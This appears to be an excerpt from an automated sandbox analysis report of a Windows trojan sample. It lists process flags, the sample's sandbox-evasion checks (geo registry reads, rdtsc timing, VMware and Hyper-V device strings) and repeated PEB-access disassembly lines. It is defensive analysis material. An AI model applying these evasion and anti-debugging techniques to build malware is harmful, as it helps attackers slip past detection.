Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

WScript reads language and country specific registry keys (likely country aware script)

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Code function: 1_2_05986DE6 rdtsc

1_2_05986DE6

Source: C:\Windows\SysWOW64\wscript.exe

API coverage: 3.2 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02725B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02725B48

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	API call chain: ExitProcess graph end node			graph_0-15367
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	API call chain: ExitProcess graph end node			graph_0-16650

Source: explorer.exe, 00000002.00000002.584469703.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000002.00000002.585090561.000000000920F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.584469703.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.301736425.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000002.00000000.310518017.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000002.00000002.584469703.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000002.00000002.584469703.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}00
Source: explorer.exe, 00000002.00000002.572313088.00000000050A1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000002.00000000.310518017.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: Iuigzwjd.exe, 0000000E.00000002.563565691.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02736388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,

0_2_02736388

Source: C:\Windows\SysWOW64\wscript.exe

Code function: 1_2_05986DE6 rdtsc

1_2_05986DE6

Source: C:\Windows\SysWOW64\wscript.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597FD9B mov eax, dword ptr fs:[00000030h]	1_2_0597FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597FD9B mov eax, dword ptr fs:[00000030h]	1_2_0597FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A105AC mov eax, dword ptr fs:[00000030h]	1_2_05A105AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A105AC mov eax, dword ptr fs:[00000030h]	1_2_05A105AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972581 mov eax, dword ptr fs:[00000030h]	1_2_05972581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972581 mov eax, dword ptr fs:[00000030h]	1_2_05972581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972581 mov eax, dword ptr fs:[00000030h]	1_2_05972581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972581 mov eax, dword ptr fs:[00000030h]	1_2_05972581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05942D8A mov eax, dword ptr fs:[00000030h]	1_2_05942D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05942D8A mov eax, dword ptr fs:[00000030h]	1_2_05942D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05942D8A mov eax, dword ptr fs:[00000030h]	1_2_05942D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05942D8A mov eax, dword ptr fs:[00000030h]	1_2_05942D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05942D8A mov eax, dword ptr fs:[00000030h]	1_2_05942D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05971DB5 mov eax, dword ptr fs:[00000030h]	1_2_05971DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05971DB5 mov eax, dword ptr fs:[00000030h]	1_2_05971DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05971DB5 mov eax, dword ptr fs:[00000030h]	1_2_05971DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059735A1 mov eax, dword ptr fs:[00000030h]	1_2_059735A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0FDE2 mov eax, dword ptr fs:[00000030h]	1_2_05A0FDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0FDE2 mov eax, dword ptr fs:[00000030h]	1_2_05A0FDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0FDE2 mov eax, dword ptr fs:[00000030h]	1_2_05A0FDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0FDE2 mov eax, dword ptr fs:[00000030h]	1_2_05A0FDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6DC9 mov eax, dword ptr fs:[00000030h]	1_2_059C6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059F8DF1 mov eax, dword ptr fs:[00000030h]	1_2_059F8DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0595D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0595D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18D34 mov eax, dword ptr fs:[00000030h]	1_2_05A18D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0E539 mov eax, dword ptr fs:[00000030h]	1_2_05A0E539
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05953D34 mov eax, dword ptr fs:[00000030h]	1_2_05953D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594AD30 mov eax, dword ptr fs:[00000030h]	1_2_0594AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059CA537 mov eax, dword ptr fs:[00000030h]	1_2_059CA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974D3B mov eax, dword ptr fs:[00000030h]	1_2_05974D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974D3B mov eax, dword ptr fs:[00000030h]	1_2_05974D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05974D3B mov eax, dword ptr fs:[00000030h]	1_2_05974D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05967D50 mov eax, dword ptr fs:[00000030h]	1_2_05967D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05983D43 mov eax, dword ptr fs:[00000030h]	1_2_05983D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C3540 mov eax, dword ptr fs:[00000030h]	1_2_059C3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059F3D40 mov eax, dword ptr fs:[00000030h]	1_2_059F3D40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596C577 mov eax, dword ptr fs:[00000030h]	1_2_0596C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596C577 mov eax, dword ptr fs:[00000030h]	1_2_0596C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595849B mov eax, dword ptr fs:[00000030h]	1_2_0595849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A014FB mov eax, dword ptr fs:[00000030h]	1_2_05A014FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_059C6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_059C6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6CF0 mov eax, dword ptr fs:[00000030h]	1_2_059C6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18CD6 mov eax, dword ptr fs:[00000030h]	1_2_05A18CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6C0A mov eax, dword ptr fs:[00000030h]	1_2_059C6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6C0A mov eax, dword ptr fs:[00000030h]	1_2_059C6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6C0A mov eax, dword ptr fs:[00000030h]	1_2_059C6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C6C0A mov eax, dword ptr fs:[00000030h]	1_2_059C6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01C06 mov eax, dword ptr fs:[00000030h]	1_2_05A01C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1740D mov eax, dword ptr fs:[00000030h]	1_2_05A1740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1740D mov eax, dword ptr fs:[00000030h]	1_2_05A1740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1740D mov eax, dword ptr fs:[00000030h]	1_2_05A1740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597BC2C mov eax, dword ptr fs:[00000030h]	1_2_0597BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DC450 mov eax, dword ptr fs:[00000030h]	1_2_059DC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DC450 mov eax, dword ptr fs:[00000030h]	1_2_059DC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A44B mov eax, dword ptr fs:[00000030h]	1_2_0597A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596746D mov eax, dword ptr fs:[00000030h]	1_2_0596746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05958794 mov eax, dword ptr fs:[00000030h]	1_2_05958794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7794 mov eax, dword ptr fs:[00000030h]	1_2_059C7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7794 mov eax, dword ptr fs:[00000030h]	1_2_059C7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C7794 mov eax, dword ptr fs:[00000030h]	1_2_059C7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059837F5 mov eax, dword ptr fs:[00000030h]	1_2_059837F5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596F716 mov eax, dword ptr fs:[00000030h]	1_2_0596F716
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DFF10 mov eax, dword ptr fs:[00000030h]	1_2_059DFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DFF10 mov eax, dword ptr fs:[00000030h]	1_2_059DFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A70E mov eax, dword ptr fs:[00000030h]	1_2_0597A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A70E mov eax, dword ptr fs:[00000030h]	1_2_0597A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597E730 mov eax, dword ptr fs:[00000030h]	1_2_0597E730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1070D mov eax, dword ptr fs:[00000030h]	1_2_05A1070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1070D mov eax, dword ptr fs:[00000030h]	1_2_05A1070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05944F2E mov eax, dword ptr fs:[00000030h]	1_2_05944F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05944F2E mov eax, dword ptr fs:[00000030h]	1_2_05944F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18F6A mov eax, dword ptr fs:[00000030h]	1_2_05A18F6A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595EF40 mov eax, dword ptr fs:[00000030h]	1_2_0595EF40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595FF60 mov eax, dword ptr fs:[00000030h]	1_2_0595FF60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A10EA5 mov eax, dword ptr fs:[00000030h]	1_2_05A10EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A10EA5 mov eax, dword ptr fs:[00000030h]	1_2_05A10EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A10EA5 mov eax, dword ptr fs:[00000030h]	1_2_05A10EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059DFE87 mov eax, dword ptr fs:[00000030h]	1_2_059DFE87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C46A7 mov eax, dword ptr fs:[00000030h]	1_2_059C46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059736CC mov eax, dword ptr fs:[00000030h]	1_2_059736CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FFEC0 mov eax, dword ptr fs:[00000030h]	1_2_059FFEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05988EC7 mov eax, dword ptr fs:[00000030h]	1_2_05988EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A18ED6 mov eax, dword ptr fs:[00000030h]	1_2_05A18ED6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059716E0 mov ecx, dword ptr fs:[00000030h]	1_2_059716E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059576E2 mov eax, dword ptr fs:[00000030h]	1_2_059576E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A61C mov eax, dword ptr fs:[00000030h]	1_2_0597A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A61C mov eax, dword ptr fs:[00000030h]	1_2_0597A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594C600 mov eax, dword ptr fs:[00000030h]	1_2_0594C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594C600 mov eax, dword ptr fs:[00000030h]	1_2_0594C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594C600 mov eax, dword ptr fs:[00000030h]	1_2_0594C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05978E00 mov eax, dword ptr fs:[00000030h]	1_2_05978E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FFE3F mov eax, dword ptr fs:[00000030h]	1_2_059FFE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01608 mov eax, dword ptr fs:[00000030h]	1_2_05A01608
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594E620 mov eax, dword ptr fs:[00000030h]	1_2_0594E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05957E41 mov eax, dword ptr fs:[00000030h]	1_2_05957E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0AE44 mov eax, dword ptr fs:[00000030h]	1_2_05A0AE44
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0AE44 mov eax, dword ptr fs:[00000030h]	1_2_05A0AE44
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596AE73 mov eax, dword ptr fs:[00000030h]	1_2_0596AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596AE73 mov eax, dword ptr fs:[00000030h]	1_2_0596AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596AE73 mov eax, dword ptr fs:[00000030h]	1_2_0596AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596AE73 mov eax, dword ptr fs:[00000030h]	1_2_0596AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596AE73 mov eax, dword ptr fs:[00000030h]	1_2_0596AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595766D mov eax, dword ptr fs:[00000030h]	1_2_0595766D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A049A4 mov eax, dword ptr fs:[00000030h]	1_2_05A049A4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A049A4 mov eax, dword ptr fs:[00000030h]	1_2_05A049A4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A049A4 mov eax, dword ptr fs:[00000030h]	1_2_05A049A4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A049A4 mov eax, dword ptr fs:[00000030h]	1_2_05A049A4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972990 mov eax, dword ptr fs:[00000030h]	1_2_05972990
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597A185 mov eax, dword ptr fs:[00000030h]	1_2_0597A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0596C182 mov eax, dword ptr fs:[00000030h]	1_2_0596C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C51BE mov eax, dword ptr fs:[00000030h]	1_2_059C51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C51BE mov eax, dword ptr fs:[00000030h]	1_2_059C51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059C51BE mov eax, dword ptr fs:[00000030h]	1_2_059C51BE
